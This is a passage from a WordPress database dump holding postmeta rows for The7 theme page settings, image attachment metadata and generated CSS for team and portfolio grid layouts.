.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(27867,3715,'_edit_lock','1675732543:1'),
(27868,3716,'_wp_attached_file','2023/02/in1.jpg'),
(27869,3716,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:113;s:6:\"height\";i:130;s:4:\"file\";s:15:\"2023/02/in1.jpg\";s:8:\"filesize\";i:6019;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27870,3715,'_thumbnail_id','3716'),
(27871,3715,'_edit_last','1'),
(27872,3715,'_dt_sidebar_position','disabled'),
(27873,3715,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27874,3715,'_dt_sidebar_hide_on_mobile','0'),
(27875,3715,'_dt_footer_show','1'),
(27876,3715,'_dt_footer_widgetarea_id','sidebar_2'),
(27877,3715,'_dt_footer_hide_on_mobile','0'),
(27878,3715,'_dt_header_title','fancy'),
(27879,3715,'_dt_header_background','normal'),
(27880,3715,'_dt_header_background_below_slideshow','disabled'),
(27881,3715,'_dt_header_transparent_bg_color_scheme','light'),
(27882,3715,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27883,3715,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27884,3715,'_dt_header_transparent_bg_color','#000000'),
(27885,3715,'_dt_header_transparent_bg_opacity','50'),
(27886,3715,'_dt_header_disabled_background','normal'),
(27887,3715,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27888,3715,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27889,3715,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27890,3715,'_dt_header_disabled_transparent_bg_color','#000000'),
(27891,3715,'_dt_header_disabled_transparent_bg_opacity','50'),
(27892,3715,'_dt_page_overrides_top_margin',''),
(27893,3715,'_dt_page_overrides_right_margin',''),
(27894,3715,'_dt_page_overrides_bottom_margin',''),
(27895,3715,'_dt_page_overrides_left_margin',''),
(27896,3715,'_dt_mobile_page_padding_top',''),
(27897,3715,'_dt_mobile_page_padding_right',''),
(27898,3715,'_dt_mobile_page_padding_bottom',''),
(27899,3715,'_dt_mobile_page_padding_left',''),
(27900,3715,'_dt_fancy_header_layout_heading',''),
(27901,3715,'_dt_fancy_header_title_aligment','center'),
(27902,3715,'_dt_fancy_header_height','300'),
(27903,3715,'_dt_fancy_header_padding-top','0px'),
(27904,3715,'_dt_fancy_header_padding-bottom','0px'),
(27905,3715,'_dt_fancy_header_breadcrumbs_heading',''),
(27906,3715,'_dt_fancy_header_breadcrumbs','disabled'),
(27907,3715,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27908,3715,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27909,3715,'_dt_fancy_header_title_heading',''),
(27910,3715,'_dt_fancy_header_title_mode','custom'),
(27911,3715,'_dt_fancy_header_title','Henry Leung'),
(27912,3715,'_dt_fancy_header_title_font_size','30'),
(27913,3715,'_dt_fancy_header_title_line_height','36'),
(27914,3715,'_dt_fancy_header_text_transform','none'),
(27915,3715,'_dt_fancy_header_title_color_mode','color'),
(27916,3715,'_dt_fancy_header_title_color','#ffffff'),
(27917,3715,'_dt_fancy_header_subtitle_heading',''),
(27918,3715,'_dt_fancy_header_subtitle',''),
(27919,3715,'_dt_fancy_header_subtitle_font_size','18'),
(27920,3715,'_dt_fancy_header_subtitle_line_height','26'),
(27921,3715,'_dt_fancy_header_subtitle_text_transform','none'),
(27922,3715,'_dt_fancy_header_subtitle_color_mode','color'),
(27923,3715,'_dt_fancy_header_subtitle_color','#ffffff'),
(27924,3715,'_dt_fancy_header_bg_heading',''),
(27925,3715,'_dt_fancy_header_bg_color','#222222'),
(27926,3715,'_dt_fancy_header_bg_image_origin','custom'),
(27927,3715,'_dt_fancy_header_bg_image','a:0:{}'),
(27928,3715,'_dt_fancy_header_bg_repeat','no-repeat'),
(27929,3715,'_dt_fancy_header_bg_position_x','center'),
(27930,3715,'_dt_fancy_header_bg_position_y','center'),
(27931,3715,'_dt_fancy_header_bg_fullscreen','1'),
(27932,3715,'_dt_fancy_header_bg_overlay','0'),
(27933,3715,'_dt_fancy_header_overlay_color','#000'),
(27934,3715,'_dt_fancy_header_bg_overlay_opacity','50'),
(27935,3715,'_dt_fancy_header_scroll_effect','default'),
(27936,3715,'_dt_fancy_header_bg_parallax','0.5'),
(27937,3715,'_dt_fancy_header_responsiveness_heading',''),
(27938,3715,'_dt_fancy_header_responsiveness','disabled'),
(27939,3715,'_dt_fancy_header_responsiveness_switch','778px'),
(27940,3715,'_dt_fancy_header_responsive_height','70'),
(27941,3715,'_dt_fancy_header_responsive_font_size','30'),
(27942,3715,'_dt_fancy_header_responsive_title_line_height','38'),
(27943,3715,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27944,3715,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27945,3715,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27946,3715,'_dt_teammate_options_go_to_single','1'),
(27947,3715,'_dt_teammate_options_position',''),
(27948,3715,'_dt_teammate_options_website',''),
(27949,3715,'_dt_teammate_options_mail',''),
(27950,3715,'_dt_teammate_options_facebook',''),
(27951,3715,'_dt_teammate_options_twitter',''),
(27952,3715,'_dt_teammate_options_dribbble',''),
(27953,3715,'_dt_teammate_options_you-tube',''),
(27954,3715,'_dt_teammate_options_rss',''),
(27955,3715,'_dt_teammate_options_delicious',''),
(27956,3715,'_dt_teammate_options_flickr',''),
(27957,3715,'_dt_teammate_options_lastfm',''),
(27958,3715,'_dt_teammate_options_linkedin',''),
(27959,3715,'_dt_teammate_options_vimeo',''),
(27960,3715,'_dt_teammate_options_tumbler',''),
(27961,3715,'_dt_teammate_options_pinterest',''),
(27962,3715,'_dt_teammate_options_devian',''),
(27963,3715,'_dt_teammate_options_skype',''),
(27964,3715,'_dt_teammate_options_github',''),
(27965,3715,'_dt_teammate_options_instagram',''),
(27966,3715,'_dt_teammate_options_stumbleupon',''),
(27967,3715,'_dt_teammate_options_behance',''),
(27968,3715,'_dt_teammate_options_px-500',''),
(27969,3715,'_dt_teammate_options_tripedvisor',''),
(27970,3715,'_dt_teammate_options_vk',''),
(27971,3715,'_dt_teammate_options_foursquare',''),
(27972,3715,'_dt_teammate_options_xing',''),
(27973,3715,'_dt_teammate_options_weibo',''),
(27974,3715,'_dt_teammate_options_odnoklassniki',''),
(27975,3715,'_dt_teammate_options_research-gate',''),
(27976,3715,'_dt_teammate_options_yelp',''),
(27977,3715,'_dt_teammate_options_blogger',''),
(27978,3715,'_dt_teammate_options_soundcloud',''),
(27979,3715,'_dt_teammate_options_viber',''),
(27980,3715,'_dt_teammate_options_whatsapp',''),
(27981,3715,'_dt_teammate_options_reddit',''),
(27982,3715,'_dt_teammate_options_snapchat',''),
(27983,3715,'_dt_teammate_options_telegram',''),
(27984,3715,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27986,3427,'_dt_microsite_primary_menu',''),
(27987,3427,'_dt_microsite_split_left_menu',''),
(27988,3427,'_dt_microsite_split_right_menu',''),
(27989,3427,'_dt_microsite_mobile_menu',''),
(27990,3709,'_wp_page_template','default'),
(27991,3709,'_dt_microsite_primary_menu',''),
(27992,3709,'_dt_microsite_split_left_menu',''),
(27993,3709,'_dt_microsite_split_right_menu',''),
(27994,3709,'_dt_microsite_mobile_menu',''),
(27995,2082,'_wp_old_date','2023-02-02'),
(27996,2083,'_wp_old_date','2023-02-02'),
(27997,2346,'_wp_old_date','2023-02-02'),
(27998,2348,'_wp_old_date','2023-02-02'),
(27999,2349,'_wp_old_date','2023-02-02'),
(28000,2350,'_wp_old_date','2023-02-02'),
(28001,2351,'_wp_old_date','2023-02-02'),
(28002,2904,'_wp_old_date','2023-02-02'),
(28003,3556,'_wp_old_date','2023-02-02'),
(28004,2084,'_wp_old_date','2023-02-02'),
(28005,2352,'_wp_old_date','2023-02-02'),
(28006,2281,'_wp_old_date','2023-02-02'),
(28007,2353,'_wp_old_date','2023-02-02'),
(28008,2354,'_wp_old_date','2023-02-02'),
(28009,2355,'_wp_old_date','2023-02-02'),
(28010,2282,'_wp_old_date','2023-02-02'),
(28011,2283,'_wp_old_date','2023-02-02'),
(28012,3671,'_wp_old_date','2023-02-02'),
(28013,3645,'_wp_old_date','2023-02-02'),
(28014,2284,'_wp_old_date','2023-02-02'),
(28015,2921,'_wp_old_date','2023-02-02'),
(28016,2285,'_wp_old_date','2023-02-02'),
(28017,2356,'_wp_old_date','2023-02-02'),
(28018,2357,'_wp_old_date','2023-02-02'),
(28019,2359,'_wp_old_date','2023-02-02'),
(28020,2358,'_wp_old_date','2023-02-02'),
(28021,2286,'_wp_old_date','2023-02-02'),
(28022,3701,'_wp_page_template','default'),
(28023,3701,'_dt_microsite_primary_menu',''),
(28024,3701,'_dt_microsite_split_left_menu',''),
(28025,3701,'_dt_microsite_split_right_menu',''),
(28026,3701,'_dt_microsite_mobile_menu',''),
(28027,3681,'_wp_page_template','default'),
(28028,3681,'_dt_microsite_primary_menu',''),
(28029,3681,'_dt_microsite_split_left_menu',''),
(28030,3681,'_dt_microsite_split_right_menu',''),
(28031,3681,'_dt_microsite_mobile_menu',''),
(28032,2795,'_dt_microsite_primary_menu',''),
(28033,2795,'_dt_microsite_split_left_menu',''),
(28034,2795,'_dt_microsite_split_right_menu',''),
(28035,2795,'_dt_microsite_mobile_menu',''),
(28036,2798,'_dt_microsite_primary_menu',''),
(28037,2798,'_dt_microsite_split_left_menu',''),
(28038,2798,'_dt_microsite_split_right_menu',''),
(28039,2798,'_dt_microsite_mobile_menu',''),
(28040,3334,'_dt_microsite_primary_menu',''),
(28041,3334,'_dt_microsite_split_left_menu',''),
(28042,3334,'_dt_microsite_split_right_menu',''),
(28043,3334,'_dt_microsite_mobile_menu',''),
(28044,3449,'_dt_microsite_primary_menu',''),
(28045,3449,'_dt_microsite_split_left_menu',''),
(28046,3449,'_dt_microsite_split_right_menu',''),
(28047,3449,'_dt_microsite_mobile_menu',''),
(28048,3497,'_dt_microsite_primary_menu',''),
(28049,3497,'_dt_microsite_split_left_menu',''),
(28050,3497,'_dt_microsite_split_right_menu',''),
(28051,3497,'_dt_microsite_mobile_menu',''),
(28052,3855,'_edit_lock','1675728070:1'),
(28053,3856,'_wp_attached_file','2023/02/ws28main.jpg'),
(28054,3856,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:232;s:6:\"height\";i:199;s:4:\"file\";s:20:\"2023/02/ws28main.jpg\";s:8:\"filesize\";i:17134;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"ws28main-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28055,3855,'_thumbnail_id','3856'),
(28056,3855,'_edit_last','1'),
(28057,3855,'_wpb_vc_js_status','true'),
(28058,3855,'_dt_sidebar_position','disabled'),
(28059,3855,'_dt_sidebar_widgetarea_id','sidebar_1'),
(28060,3855,'_dt_sidebar_hide_on_mobile','0'),
(28061,3855,'_dt_footer_show','1'),
(28062,3855,'_dt_footer_widgetarea_id','sidebar_2'),
(28063,3855,'_dt_footer_hide_on_mobile','0'),
(28064,3855,'_dt_header_title','fancy'),
(28065,3855,'_dt_header_background','normal'),
(28066,3855,'_dt_header_background_below_slideshow','disabled'),
(28067,3855,'_dt_header_transparent_bg_color_scheme','light'),
(28068,3855,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28069,3855,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28070,3855,'_dt_header_transparent_bg_color','#000000'),
(28071,3855,'_dt_header_transparent_bg_opacity','50'),
(28072,3855,'_dt_header_disabled_background','normal'),
(28073,3855,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28074,3855,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28075,3855,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28076,3855,'_dt_header_disabled_transparent_bg_color','#000000'),
(28077,3855,'_dt_header_disabled_transparent_bg_opacity','50'),
(28078,3855,'_dt_page_overrides_top_margin',''),
(28079,3855,'_dt_page_overrides_right_margin',''),
(28080,3855,'_dt_page_overrides_bottom_margin',''),
(28081,3855,'_dt_page_overrides_left_margin',''),
(28082,3855,'_dt_mobile_page_padding_top',''),
(28083,3855,'_dt_mobile_page_padding_right',''),
(28084,3855,'_dt_mobile_page_padding_bottom',''),
(28085,3855,'_dt_mobile_page_padding_left',''),
(28132,3855,'_dt_project_options_back_button',''),
(28133,3855,'_dt_project_options_show_link',''),
(28134,3855,'_dt_project_options_link',''),
(28135,3855,'_dt_project_options_link_target',''),
(28136,3855,'_dt_project_options_link_name',''),
(28137,3855,'_dt_project_options_hide_thumbnail','1'),
(28138,3855,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(28139,3855,'_dt_project_options_related_mode','same'),
(28140,3855,'_dt_project_options_preview','normal'),
(28142,3855,'_wp_page_template','default'),
(28143,3855,'_dt_microsite_primary_menu',''),
(28144,3855,'_dt_microsite_split_left_menu',''),
(28145,3855,'_dt_microsite_split_right_menu',''),
(28146,3855,'_dt_microsite_mobile_menu',''),
(28147,3859,'_wp_attached_file','2023/02/ws28main2.jpg'),
(28148,3859,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:392;s:6:\"height\";i:290;s:4:\"file\";s:21:\"2023/02/ws28main2.jpg\";s:8:\"filesize\";i:52740;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"ws28main2-300x222.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19208;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"ws28main2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8536;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28149,3861,'_wp_attached_file','2023/02/ws28main3.jpg'),
(28150,3861,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:377;s:6:\"height\";i:295;s:4:\"file\";s:21:\"2023/02/ws28main3.jpg\";s:8:\"filesize\";i:49396;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"ws28main3-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18610;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"ws28main3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8128;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(28151,3855,'the7_shortcodes_dynamic_css','a:2:{s:32:\"1c92d1448d14733a9d41f2ad730edfca\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1c92d1448d14733a9d41f2ad730edfca.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  